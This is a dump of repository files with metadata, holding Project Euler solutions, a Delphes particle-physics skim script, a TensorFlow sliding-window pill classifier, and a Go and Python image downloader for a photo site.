"package Worker\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"net/http\"\n\t\"pd_go/Libs\"\n\t\"runtime\"\n\t\"strings\"\n\t\"sync\"\n\t\"time\"\n)\n\nvar lock sync.Mutex\n\ntype Queue struct {\n\tdata [][]string\n\tlength int\n}\n\nfunc NewQueue() *Queue {\n\treturn &Queue{data: [][]string{}, length: 0}\n}\nfunc (q *Queue) AppendValue(s []string) {\n\tlock.Lock()\n\t(*q).data = append((*q).data, s)\n\t(*q).length++\n\tlock.Unlock()\n}\nfunc (q *Queue) getOne() []string {\n\tlock.Lock()\n\tvar temp []string\n\t//fmt.Println(len(q.data))\n\t//if len((*q).data) > 0 {\n\tif (*q).length > 0 {\n\t\ttemp = (*q).data[0]\n\t\t(*q).data = (*q).data[1:]\n\t\t(*q).length--\n\t}\n\tlock.Unlock()\n\treturn temp\n}\nfunc (q *Queue) isNil() bool {\n\treturn (*q).length == 0\n}\n\nfunc Work(q *Queue, WorkId int32) {\n\tfor {\n\t\taUrl := (*q).getOne()\n\t\tif aUrl != nil {\n\t\t\tfmt.Printf(\"Worker[%d] receviced a task.\\n\", WorkId)\n\n\t\t\ttimeStr := aUrl[2]\n\t\t\t// timeStr:=time.Now().Format(\"2006-01-02--15-04-05\")\n\t\t\t// os.Mkdir(timeStr,0644)\n\t\t\t// ioutil.WriteFile(fmt.Sprintf(\"%s/%s__url.txt\", timeStr, timeStr), []byte(url), 0644)\n\t\t\tres, err := 
GET(aUrl[1], nil)\n\t\t\tif err != 200 {\n\t\t\t\tfmt.Printf(\"HTTP Error: Code [%d]\\n\", err)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tioutil.WriteFile(\n\t\t\t\tfmt.Sprintf(\"%s/%s__%s.%s\", timeStr, timeStr, aUrl[0], aUrl[1][strings.LastIndex(aUrl[1], \".\")+1:]),\n\t\t\t\tres, 0644,\n\t\t\t)\n\t\t\tfmt.Printf(\"Worker[%d] finished a task.\\t%d task(s) left in the queue\\n\", WorkId, (*q).length)\n\t\t}\n\t}\n}\n\nfunc Repair(folder string, q *Queue) {\n\trawLog, err := ioutil.ReadFile(fmt.Sprintf(\"%s/%s__log.txt\", folder, folder))\n\tvar logJson map[string]string\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t\treturn\n\t}\n\terr = json.Unmarshal(rawLog, &logJson)\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t\treturn\n\t}\n\tfor k, v := range logJson {\n\t\t//fmt.Printf(fmt.Sprintf(\"%s/%s__%s.%s\", folder, folder, k, v[strings.LastIndex(v, \".\")+1:]))\n\t\tif Libs.LibsXExists(fmt.Sprintf(\"%s/%s__%s.%s\", folder, folder, k, v[strings.LastIndex(v, \".\")+1:])) {\n\t\t\tdelete(logJson, k)\n\t\t} else {\n\t\t\t(*q).AppendValue([]string{k, v, folder})\n\t\t}\n\t}\n\tfmt.Printf(\"Repair: %d was enqueued.\\n\", len(logJson))\n}\n\nfunc GET(url string, headers map[string]string) ([]byte, int) {\n\tclient := &http.Client{Timeout: 5 * time.Second}\n\treqest, err := http.NewRequest(\"GET\", url, nil) //build the GET request\n\tif err != nil {\n\t\tfmt.Println(\"Fatal error \", err.Error())\n\t\treturn []byte(\"\"), 0\n\t}\n\t//Add Header\n\treqest.Header.Add(\"User-Agent\", \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0\")\n\tif headers != nil {\n\t\tfor k, v := range headers {\n\t\t\treqest.Header.Add(k, v)\n\t\t}\n\t}\n\tresponse, err := client.Do(reqest)\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t\treturn []byte(\"\"), 0\n\t}\n\tdefer response.Body.Close()\n\t// cookies := response.Cookies() //iterate over the cookies\n\t//for _, cookie := range cookies {\n\t//\tfmt.Println(\"cookie:\", cookie)\n\t//}\n\n\tresponseBody, _ := ioutil.ReadAll(response.Body)\n\tCode := response.StatusCode\n\t//if err1 != nil {\n\t//\t// handle error\n\t//}\n\t//fmt.Println(string(response_body)) //page source\n\treturn responseBody, Code\n}\nfunc ProtectRun(entry func()) {\n\tdefer func() {\n\t\terr := recover()\n\t\tswitch err.(type) {\n\t\tcase runtime.Error:\n\t\t\tfmt.Println(\"runtime error:\", err)\n\t\tdefault:\n\t\t\tfmt.Println(\"error:\", err)\n\t\t}\n\t}()\n\tentry()\n}\n" }, { "alpha_fraction": 0.5265794396400452, "alphanum_fraction": 0.5452268123626709, "avg_line_length": 29.709402084350586, "blob_id": "e7aa83e444319fb3f6836e0170179f388349f943", "content_id": "881ee85fa94c2ccd2f13c5a275434d01f191d491", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3593, "license_type": "permissive", "max_line_length": 140, "num_lines": 117, "path": "/bcy.py", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "# version : v1.42\nimport url_lib\nimport re\nimport timelib\nimport Threadinglib\nimport sys\nimport json\nimport os\nimport subprocess as sp\nfrom collections import deque\n\n\ndef download_beta(path=\"\", iter=\"\"):\n    d_ub = url_lib.url_lib()\n    while iter:\n        iter_data = iter.popleft()\n        d_ub.url = iter_data[1]\n        # print(d_ub.url)\n        try:\n            with open(path+\"/\"+path+\"__\"+str(iter_data[0])+os.path.splitext(iter_data[1])[-1], \"wb\", buffering=5*1024*1024+1) as photo_file:\n                photo = d_ub.Get()\n                
photo_data = photo.read(5*1024*1024)\n            print(iter_data[0], \"file is downloaded.\")\n        except IOError:\n            print(iter_data[0], \" file failed.\")\n\n\ndef repair(path):\n    import os\n    with open(path+\"/\"+path+\"_url.txt\", \"r\") as url_file:\n        ub.url = url_file.read()\n    txt = ub.Get().read().decode(\"utf-8\")\n    jpg_list = get_jpg_list(txt)\n    if not jpg_list:\n        raise RuntimeError(\"no image list found in page\")\n    jpg_url_enu = list()\n    logdata = str(\"\\n\\n\")\n    for i in enumerate(jpg_list):\n        jpg_url_enu.append([i[0]+1, i[1]])\n        logdata += str(i[0]+1)+\" : \"+i[1] + \"\\n\"\n    re_download = []\n    for i in jpg_url_enu:\n        if not os.path.exists(path+\"/\"+path+\"__\"+str(i[0])+\".jpg\"):\n            re_download += [i]\n    re_download_de_iterator = deque(re_download)\n    @timelib.Timelog\n    def repair_now():\n        log(path, logdata)\n        Threadinglib.Delay_Threading_To_Exit(Threadinglib.Multithreading_Run(\n            [download_beta]*3, [[path, re_download_de_iterator]]*3))\n\n\ndef get_jpg_list(txt=\"\"):\n    txtline = re.compile(\"JSON\\.parse[^\\n]+\\n\").findall(txt)[0][12:-4]\n    txtline = txtline.encode(\"raw_unicode_escape\").decode(\"unicode_escape\")\n    data = json.loads(txtline)\n    jpg_list = []\n    for i in data[\"detail\"][\"post_data\"][\"multi\"]:\n        jpg_list += [i[\"original_path\"]]\n    return jpg_list\n\n\ndef log(path, data):\n    try:\n        if data.replace(\"\\n\", \"\"):\n            open(path+\"/\"+path+\"__log.log\", \"a\").write(data)\n            print(\"log succ\")\n    except IOError as err:\n        print(\"Error: \"+str(err))\n\n\nub = url_lib.url_lib()\nwhile True:\n    key = input(\"\\nbcy_url \")\n    if key[:4] == \"http\":\n        ub.url = key\n    else:\n        repair(key)\n        continue\n    txt = ub.Get()\n    if txt.getcode() != 200:\n        print(\"Error:\", txt.getcode())\n        continue\n    txt = txt.read().decode(\"utf-8\")\n\n    jpg_list = get_jpg_list(txt)\n    if not jpg_list:\n        continue\n\n    logdata = dict()\n    jpg_url_enu = list()\n    for i in enumerate(jpg_list):\n        jpg_url_enu.append([i[0]+1, i[1]])\n        logdata[str(i[0]+1)] = i[1]\n    jpg_url_de_iterator = deque(jpg_url_enu)\n\n    # @timelib.Timelog\n    def download_now():\n        path = timelib.Showtime(r\"$year-$mon-$day--$hour-$min-$sec\")\n        os.mkdir(path)\n        log(path, json.dumps(logdata))\n        with open(path+\"/\"+path+\"_url.txt\", \"w\") as url_file:\n            if \"?\" in ub.url:\n                url_file.write(ub.url[:ub.url.index(\"?\")])\n            else:\n                url_file.write(ub.url)\n        if len(jpg_list) > 4:\n            Threadinglib.Delay_Threading_To_Exit(Threadinglib.Multithreading_Run(\n                [download_beta]*4, [[path, jpg_url_de_iterator]]*4))\n        else:\n            Threadinglib.Delay_Threading_To_Exit(Threadinglib.Multithreading_Run(\n                [download_beta]*3, [[path, jpg_url_de_iterator]]*3))\n    download_now()\n" }, { "alpha_fraction": 0.5454545617103577, "alphanum_fraction": 0.6818181872367859, "avg_line_length": 6.333333492279053, "blob_id": "1c9ea36dff64be36e86d7582bc362860390b1732", "content_id": "dbfa23865d099a1daf7ce71892046d04920cf34d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Go Module", "length_bytes": 22, "license_type": "permissive", "max_line_length": 12, "num_lines": 3, "path": "/pd_go/go.mod", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "module pd_go\n\ngo 1.14\n" } ]
10
silviodonato/DelphesSkim-old
https://github.com/silviodonato/DelphesSkim-old
764b1737604aa0f7ef075301275275d819995e80
a0a47bf1b8e16b9717b50db13e2a792ba1585f53
dd6903b2135150445b4f9eae7e620e64fdba6467
refs/heads/master
2023-02-27T11:42:28.981766
2021-01-31T16:10:17
2021-01-31T16:10:17
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6431187987327576, "alphanum_fraction": 0.6789638996124268, "avg_line_length": 40.543479919433594, "blob_id": "67764833c9c08c2cee82c5c3a2c857c5d1b8c72b", "content_id": "6dfacfcf8a3800548cb19aa4d7e07a92527a5f09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3822, "license_type": "no_license", "max_line_length": 377, "num_lines": 92, "path": "/converter.py", "repo_name": "silviodonato/DelphesSkim-old", "src_encoding": "UTF-8", "text": "import ROOT\n\nsampleName = \"vbfHmm_powheg\"\n\nindex = 0\n#for i in range(0, 38):\n# print(i)\n\t\n\t\nsamples = {\"vbfHmm_powheg\":\n\"root://eoscms.cern.ch//store/group/upgrade/delphes_output/YR_Delphes/Delphes342pre14/VBFHToMuMu_M125_14TeV_powheg_pythia8_200PU/VBFHToMuMu_M125_14TeV_powheg_pythia8_*%d.root\"%index\n}\n\n\nInvariantMass_code ='''\nfloat InvariantMass (float pt1, float eta1, float phi1, float mass1, float pt2, float eta2, float phi2, float mass2)\n{\n TLorentzVector mu1, mu2;\n mu1.SetPtEtaPhiM( pt1, eta1, phi1, mass1);\n mu2.SetPtEtaPhiM( pt2, eta2, phi2, mass2);\n float mass = (mu1+mu2).M();\n return mass;\n}\n'''\n\nmqq_code ='''\nfloat mqq (float pt1, float eta1, float phi1, float mass1, float pt2, float eta2, float phi2, float mass2)\n{\n TLorentzVector j1, j2;\n j1.SetPtEtaPhiM( pt1, eta1, phi1, mass1);\n j2.SetPtEtaPhiM( pt2, eta2, phi2, mass2);\n float mass = (j1+j2).M();\n return mass;\n}\n'''\n########################\n\ndf = ROOT.RDataFrame(\"Delphes\", samples[sampleName])\n\n#sum = df.Filter(\"MuonTight_size > 0\").Sum(\"Jet_size\")\n#print(sum.GetValue())\n\ndf_out = df.Define(\"sum_size\", \"MuonTight_size+Jet_size\")\n\n\ndf_out = df_out.Define(\"MuonTight_pt\", \"MuonTight.PT\")\ndf_out = df_out.Define(\"MuonTight_eta\", \"MuonTight.Eta\")\ndf_out = df_out.Define(\"MuonTight_phi\", \"MuonTight.Phi\")\ndf_out = df_out.Define(\"MuonTight_t\", \"MuonTight.T\")\ndf_out = df_out.Define(\"MuonTight_charge\", \"MuonTight.Charge\")\n#df_out = df_out.Define(\"MuonTight_particle\", \"MuonTight.Particle\")\ndf_out = df_out.Define(\"MuonTight_isolationvar\", \"MuonTight.IsolationVar\")\ndf_out = df_out.Define(\"MuonTight_isolationvarrhocorr\", \"MuonTight.IsolationVarRhoCorr\")\ndf_out = df_out.Define(\"MuonTight_sumptcharged\", \"MuonTight.SumPtCharged\")\ndf_out = df_out.Define(\"MuonTight_sumptneutral\", \"MuonTight.SumPtNeutral\")\ndf_out = df_out.Define(\"MuonTight_sumptchargedPU\", \"MuonTight.SumPtChargedPU\")\ndf_out = df_out.Define(\"MuonTight_sumpt\", \"MuonTight.SumPt\")\n\ndf_out = df_out.Define(\"Jet_pt\", \"Jet.PT\")\ndf_out = df_out.Define(\"Jet_eta\", \"Jet.Eta\")\ndf_out = df_out.Define(\"Jet_phi\", \"Jet.Phi\")\ndf_out = df_out.Define(\"Jet_mass\", \"Jet.Mass\")\n\n\n## Define DiMuon mass ##\nROOT.gInterpreter.Declare(InvariantMass_code) ## compile invariant mass code\ndf_out = df_out.Define(\"DiMuon_mass\", \"InvariantMass( MuonTight_pt[0], MuonTight_eta[0], MuonTight_phi[0], 0.106, MuonTight_pt[1], MuonTight_eta[1], MuonTight_phi[1], 0.106)\") ## define DiMuon_mass variable (0.106 GeV is the muon mass)\n###\n\nROOT.gInterpreter.Declare(mqq_code) ## compile invariant mass code\ndf_out = df_out.Define(\"DiJet_mass\", \"mqq( Jet_pt[0], Jet_eta[0], Jet_phi[0], Jet_mass[0], Jet_pt[1], Jet_eta[1], Jet_phi[1], Jet_mass[1] )\")\n\n\n## Cuts ##\ndf_out = df_out.Filter(\"MuonTight_size >= 2\") #require at least two muon\ndf_out = df_out.Filter(\"MuonTight_pt[0] > 20 && MuonTight_pt[1] > 20\")\ndf_out = df_out.Filter(\"abs(MuonTight_eta[0]) < 
2.8 && abs(MuonTight_eta[1]) < 2.8\") #require the first muon to have pt>50 GeV\ndf_out = df_out.Filter(\"DiMuon_mass > 110 && DiMuon_mass < 150\") #require at least two muon\n\n#df_out = df_out.Filter(\"Jet_size >= 2\")\ndf_out = df_out.Filter(\"Jet_pt[0] > 35 && Jet_pt[1] > 25\")\ndf_out = df_out.Filter(\"abs(Jet_eta[0]) < 4.7 && abs(Jet_eta[1]) < 4.7\")\ndf_out = df_out.Filter(\"abs(Jet_eta[0] - Jet_eta[1]) < 2.5 \")\ndf_out = df_out.Filter(\"DiJet_mass > 400\")\n\nhist = df_out.Histo1D(\"MuonTight_pt\")\n\nprint(\"Launch Snapshot\")\n\ndf_out.Snapshot(\"Events\", \"%s_%d.root\"%(sampleName, index), {'MuonTight_pt', 'MuonTight_eta', 'MuonTight_phi', 'MuonTight_t', 'MuonTight_charge', 'MuonTight_isolationvar', 'MuonTight_isolationvarrhocorr', 'MuonTight_sumptcharged', 'MuonTight_sumptneutral', 'MuonTight_sumptchargedPU', 'MuonTight_sumpt', 'Jet_pt', 'Jet_eta', 'Jet_phi', 'Jet_mass','DiMuon_mass', 'DiJet_mass'});\n\nprint(\"Finished\")\n" } ]
1
Trenchers/Automated-Dispensary
https://github.com/Trenchers/Automated-Dispensary
eb01a23b6c9ffcee82581a1c02da3c799bf12300
1930b448089e1c18b1d4f63bb0ede5c649155527
48310b3248e32a792c6e9a9282636c440097370c
refs/heads/master
2021-04-06T08:21:37.297497
2018-04-09T16:00:44
2018-04-09T16:00:44
125,255,991
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.7920354008674622, "alphanum_fraction": 0.8274336457252502, "avg_line_length": 112, "blob_id": "96110c42cdb585c503b91d3059fc82caa16b4529", "content_id": "acff91bf65ed5baaf8535a0936f70bd3e5233cc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 226, "license_type": "no_license", "max_line_length": 202, "num_lines": 2, "path": "/README.md", "repo_name": "Trenchers/Automated-Dispensary", "src_encoding": "UTF-8", "text": "# Automated-Dispensary\nThe scripts are currently in use, but the Raw Datasets above have been deprecated. The new dataset is uploaded here: https://drive.google.com/drive/folders/1EC2PbwGVHGyoi95cuxI8wS45CqqbBJb1?usp=sharing.\n" }, { "alpha_fraction": 0.8245614171028137, "alphanum_fraction": 0.8245614171028137, "avg_line_length": 56, "blob_id": "b45716a0234dfedad85c5fa1a160e1accd7436e7", "content_id": "dde1f504fdede08ec801f83d77b3384e26b6aa0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 57, "license_type": "no_license", "max_line_length": 56, "num_lines": 1, "path": "/Raw Datasets/1.Cheston Cold/readme.md", "repo_name": "Trenchers/Automated-Dispensary", "src_encoding": "UTF-8", "text": "This folder contains raw images of Cheston cold tablets.\n" }, { "alpha_fraction": 0.801886796951294, "alphanum_fraction": 0.801886796951294, "avg_line_length": 105, "blob_id": "8b25e3c37549b08e98f49f168f1dc561c3ea4425", "content_id": "47daec2b622f1d7181ae6dd96c5d584a9ebcb9b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 106, "license_type": "no_license", "max_line_length": 105, "num_lines": 1, "path": "/Raw Datasets/info.md", "repo_name": "Trenchers/Automated-Dispensary", "src_encoding": "UTF-8", "text": "This folder contains raw datasets. Enjoy. Try cooking it for a different flavour. Tastes better than raw.\n" }, { "alpha_fraction": 0.542614221572876, "alphanum_fraction": 0.5600157976150513, "avg_line_length": 29.506250381469727, "blob_id": "2cdbe6241475721935e92744784c11ffafa374c0", "content_id": "770e7216d9e155e3ab6295e72d404a4976c01fe9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5057, "license_type": "no_license", "max_line_length": 152, "num_lines": 160, "path": "/scripts/sliding_window.py", "repo_name": "Trenchers/Automated-Dispensary", "src_encoding": "UTF-8", "text": "import argparse\r\nimport sys\r\nimport time\r\nimport os\r\nimport cv2\r\n\"\"\"\r\nDEL_X=2 #change in X and Y\r\nDEL_Y=1\r\nSIDE_X=30 #initial side lengths\r\nSIDE_Y=40\r\n\r\ndef crop_img(path,pos): #pos is the index of the sliding window\r\n img=cv2.imread(path)\r\n [x_max,y_max]=img.size\r\n if((pos*DELTA_X/x_max)*DELTA_Y<y_max):\r\n os.remove('result.csv')\r\n cropped_img=img[int((pos*DELTA_X/x_max)*DELTA_Y):int((pos*DELTA_X/x_max)*DELTA_Y)+SIDE_Y , int(pos*DELTA_X%x_max):int(pos*DELTA_X%x_max)+SIDE_X]\r\n cv2.imwrite(path2)\r\n os.system(\"python -m scripts.label_image \\\r\n --graph=tf_files/retrained_graph.pb \\\r\n --image=\"+path2)\r\n file=open('Database.csv')\r\n reader=csv.reader(file)\r\n data=list(reader)\r\n for x in data:\r\n if x[1]>0.95 and x[0]!='negative':\r\n print(x[0])\r\n print(\"at window no. 
\" + str(pos))\r\n break\r\n else:\r\n exit(0)\r\n \r\n \r\n\r\n\r\ni=0\r\nwhile True:\r\n crop_img(\"\",i)\r\n i=i+1\r\n \"\"\"\r\n\r\nimport numpy as np\r\nimport tensorflow as tf\r\n\r\ndef load_graph(model_file):\r\n graph = tf.Graph()\r\n graph_def = tf.GraphDef()\r\n\r\n with open(model_file, \"rb\") as f:\r\n graph_def.ParseFromString(f.read())\r\n with graph.as_default():\r\n tf.import_graph_def(graph_def)\r\n\r\n return graph\r\n\r\ndef read_tensor_from_image_file(file_name, input_height=299, input_width=299,\r\n\t\t\t\tinput_mean=0, input_std=255):\r\n input_name = \"file_reader\"\r\n output_name = \"normalized\"\r\n file_reader = tf.read_file(file_name, input_name)\r\n if file_name.endswith(\".png\"):\r\n image_reader = tf.image.decode_png(file_reader, channels = 3,\r\n name='png_reader')\r\n elif file_name.endswith(\".gif\"):\r\n image_reader = tf.squeeze(tf.image.decode_gif(file_reader,\r\n name='gif_reader'))\r\n elif file_name.endswith(\".bmp\"):\r\n image_reader = tf.image.decode_bmp(file_reader, name='bmp_reader')\r\n else:\r\n image_reader = tf.image.decode_jpeg(file_reader, channels = 3,\r\n name='jpeg_reader')\r\n float_caster = tf.cast(image_reader, tf.float32)\r\n dims_expander = tf.expand_dims(float_caster, 0);\r\n resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])\r\n normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])\r\n sess = tf.Session()\r\n result = sess.run(normalized)\r\n\r\n return result\r\n\r\ndef load_labels(label_file):\r\n label = []\r\n proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()\r\n for l in proto_as_ascii_lines:\r\n label.append(l.rstrip())\r\n return label\r\n\r\ndef make_pred(image):\r\n file_name = image\r\n model_file = \"tf_files/retrained_graph.pb\"\r\n label_file = \"tf_files/retrained_labels.txt\"\r\n input_height = 224\r\n input_width = 224\r\n input_mean = 128\r\n input_std = 128\r\n input_layer = \"input\"\r\n output_layer = \"final_result\"\r\n graph = load_graph(model_file)\r\n t = read_tensor_from_image_file(file_name,\r\n input_height=input_height,\r\n input_width=input_width,\r\n input_mean=input_mean,\r\n input_std=input_std)\r\n\r\n input_name = \"import/\" + input_layer\r\n output_name = \"import/\" + output_layer\r\n input_operation = graph.get_operation_by_name(input_name);\r\n output_operation = graph.get_operation_by_name(output_name);\r\n\r\n with tf.Session(graph=graph) as sess:\r\n start = time.time()\r\n results = sess.run(output_operation.outputs[0],\r\n {input_operation.outputs[0]: t}) #my code\r\n end=time.time()\r\n i=np.where(results==max(results[0]))[1][0]\r\n \r\n results = np.squeeze(results)\r\n\r\n top_k = results.argsort()[-5:][::-1]\r\n \r\n labels = load_labels(label_file)\r\n print(labels[i])\r\n print(max(results))\r\n return [labels,results] #mine\r\n\r\n \r\ndef sliding_window(file):\r\n points=[]\r\n xmin=0\r\n ymin=0\r\n xmax=160\r\n ymax=160\r\n image=cv2.imread(file)\r\n step=30\r\n path=\"tf_files/folder/buff\"\r\n while xmax<1000:\r\n xmin=xmin+step #correct this\r\n xmax=xmax+step\r\n ymin=0\r\n ymax=160\r\n while ymax<600:\r\n ymin=ymin+step\r\n ymax=ymax+step\r\n cropped_image = image[ymin:ymax,xmin:xmax]\r\n path_max=path+str(xmin)+\",\"+str(ymin)+\".jpg\"\r\n cv2.imwrite(path_max,cropped_image)\r\n #cv2.imshow(\"\",cropped_image)\r\n #time.sleep(2)\r\n #cv2.destroyAllWindows()\r\n result = make_pred(path_max)\r\n print(\"on window\",xmin,ymin)\r\n '''for x in range(len(result[0])):\r\n if(result[0][x]>=0.99):\r\n 
points.append({((xmax-xmin)/2),((ymax-ymin)/2)})\r\n break\r\n\t\t\t'''\r\n return points #returns a 1d array of centroids of all clusters\r\n \r\n \r\nsliding_window(\"C:/Users/Atharv/Desktop/ITSP/Photos/Digene.jpg\")\r\n\r\n \r\n" }, { "alpha_fraction": 0.8181818127632141, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 43, "blob_id": "a4509876326597f6286061e1a02dc4141494d047", "content_id": "435d35705ea04274e872853ac17636092720d9bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "no_license", "max_line_length": 43, "num_lines": 1, "path": "/Raw Datasets/2.Norflox/readme.md", "repo_name": "Trenchers/Automated-Dispensary", "src_encoding": "UTF-8", "text": "This folder contains raw images of Norflox.\n" }, { "alpha_fraction": 0.8074533939361572, "alphanum_fraction": 0.8074533939361572, "avg_line_length": 160, "blob_id": "7d192bdd3fb1abe69c38adb234625da7f5d96956", "content_id": "e11d0fce9a1f355ad15f1cce1b54f5805665a245", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 161, "license_type": "no_license", "max_line_length": 160, "num_lines": 1, "path": "/scripts/README.md", "repo_name": "Trenchers/Automated-Dispensary", "src_encoding": "UTF-8", "text": "In this folder, we have written the sliding_window.py script. The retraining code and the labelling code has been taken from the Open Source code by TensorFlow.\n" } ]
6
racc/euler
https://github.com/racc/euler
fa10a9ed46ff9fe430801dc24447599671bca9c4
fe6c49fac51317be3bc42634881fdc43b65c8c87
4c726ce17465783ea4d8db829a69f8cc1b89e5be
refs/heads/master
2016-09-05T19:31:01.338705
2012-02-16T19:34:46
2012-02-16T19:34:46
2,204,438
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6153846383094788, "alphanum_fraction": 0.6361416578292847, "avg_line_length": 25.419355392456055, "blob_id": "47ecd8ef4995934d1842b892be907d5e99328fc9", "content_id": "17ab74a1e1ab3eab6e4e63821f5a34912a18bd78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 819, "license_type": "no_license", "max_line_length": 57, "num_lines": 31, "path": "/32/unusual_pandigitals.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nimport itertools\n\ndigits = [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"]\ndigits_set = set(digits)\nprod_tuples = [(3, 2), (4, 1)]\n\ndef prod_is_pandigital(prod, diff):\n\tsorted_digits = sorted(list(str(prod)) + diff)\n\treturn sorted_digits == digits\n\ndef iter_to_int(t):\n\treturn int(\"\".join(t))\n\nprods = set([])\n\nfor tup in prod_tuples:\n\tfor comb in itertools.combinations(digits, tup[0]):\n\t\tfor perm in itertools.permutations(comb):\n\t\t\tdiff = list(digits_set - set(perm))\n\t\t\ta = iter_to_int(perm)\n\t\t\tfor comb_diff in itertools.combinations(diff, tup[1]):\n\t\t\t\targs = list(comb_diff) + list(perm)\n\t\t\t\tfor perm_diff in itertools.permutations(comb_diff):\n\t\t\t\t\tb = iter_to_int(perm_diff)\n\t\t\t\t\tprod = a * b\n\t\t\t\t\tif (prod_is_pandigital(prod, args)):\n\t\t\t\t\t\tprods.add(prod)\n\t\nprint(reduce(lambda x, y: x + y, prods))\n" }, { "alpha_fraction": 0.4847457706928253, "alphanum_fraction": 0.5627118349075317, "avg_line_length": 12.409090995788574, "blob_id": "b72fc9a1e4c7114b3d41caea674d61bf073e47fa", "content_id": "59906b29c8ff005d6125d8c62b2a337012e853d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 295, "license_type": "no_license", "max_line_length": 36, "num_lines": 22, "path": "/53/combinations.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nFactorial = Hash[1,1,0,1]\n(2..101).each do |x|\n\tFactorial[x] = Factorial[x-1] * x\nend\n\ndef c(n, r)\n\tn_r = Factorial[n - r]\n\tFactorial[n] / (Factorial[r] * n_r)\nend\n\ncount = 0\n(1..100).each do |n|\n\t(1..n).each do |r|\n\t\tif c(n, r) > 1000000\n\t\t\tcount += 1\t\n\t\tend\n\tend\nend\n\np count\n" }, { "alpha_fraction": 0.5971302390098572, "alphanum_fraction": 0.6490066051483154, "avg_line_length": 29.200000762939453, "blob_id": "84a3d18a2dfa438ceb5e85658616aeaeb0ffc7bc", "content_id": "5da28f5816e9b08ba2fd0084b6099ead72712796", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 906, "license_type": "no_license", "max_line_length": 101, "num_lines": 30, "path": "/70/totient_permutations.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\n# To really make this faster, find the biggest number < 10 ** 7 which is the multiple\n# of two primes, where the totient function is a permutation\n#\n# This is because since phi(n) = n(1-1/p1)(1-1/p2)...(1-1/pk)\n# n/phi(n) = 1/((1-1/p1)(1-1/p2)...(1-1/pk))\n# We want to minimise n/phi(n) by maximising (1-1/p1)(1-1/p2)...(1-1/pk)\n# So to maximise it, we need to minimise the number of entries (each multiplication makes it smaller)\n# But also make p as large as possible...\n\nimport os, sys\nsys.path.append(os.path.dirname(os.path.abspath(__file__)) + \"/../util/python/\")\nfrom totient import *\n\ndef is_permutation(a, b):\n\treturn sorted(str(a)) == sorted(str(b)) \n\nmin_ratio = float(1000000000)\nmin_n = 0\n\nfor n in 
xrange(10 ** 6, 10 ** 7):\n\tt = totient(n)\n\tif is_permutation(n, t):\n\t\tratio = float(n) / float(t) \n\t\tif ratio < min_ratio:\n\t\t\tmin_ratio = ratio\n\t\t\tmin_n = n\n\nprint(min_n)\n" }, { "alpha_fraction": 0.410526305437088, "alphanum_fraction": 0.49473685026168823, "avg_line_length": 9.55555534362793, "blob_id": "d6313bdc2058720a407d75dd3e22ed6801ea4ae3", "content_id": "e1fb75fbdbe14868433eac2af65f8287207776bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 95, "license_type": "no_license", "max_line_length": 41, "num_lines": 9, "path": "/5/divisible.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\na = 20\nloop do\n\tbreak if (1..20).all? { |n| a % n == 0 }\n\ta += 20\nend\n\nputs a\n" }, { "alpha_fraction": 0.6275168061256409, "alphanum_fraction": 0.6644295454025269, "avg_line_length": 23.83333396911621, "blob_id": "1846a201c4f7c7fd3509589908f5d31f29ab9ff0", "content_id": "d64f92380cb43121a6d0561eddc7cdb6738c7c94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 298, "license_type": "no_license", "max_line_length": 79, "num_lines": 12, "path": "/34/sum_factorial_digits.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nimport math\n\ncurious_nums = []\n\n# Came up with an arbitrary upper limit\nfor i in range(3, 1000000):\n\tsum_of_facts = reduce(lambda x, y: int(x) + math.factorial(int(y)), str(i), 0)\n\tif sum_of_facts == i:\n\t\tcurious_nums.append(i)\n\nprint(reduce(lambda x, y: x + y, curious_nums))\n" }, { "alpha_fraction": 0.613595724105835, "alphanum_fraction": 0.633273720741272, "avg_line_length": 24.227272033691406, "blob_id": "ab8e85c1f371d78ac93c1b032efbe5c268e59d9f", "content_id": "3fbc94b32f5557940b79f7bcfbf76e73849de2d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 559, "license_type": "no_license", 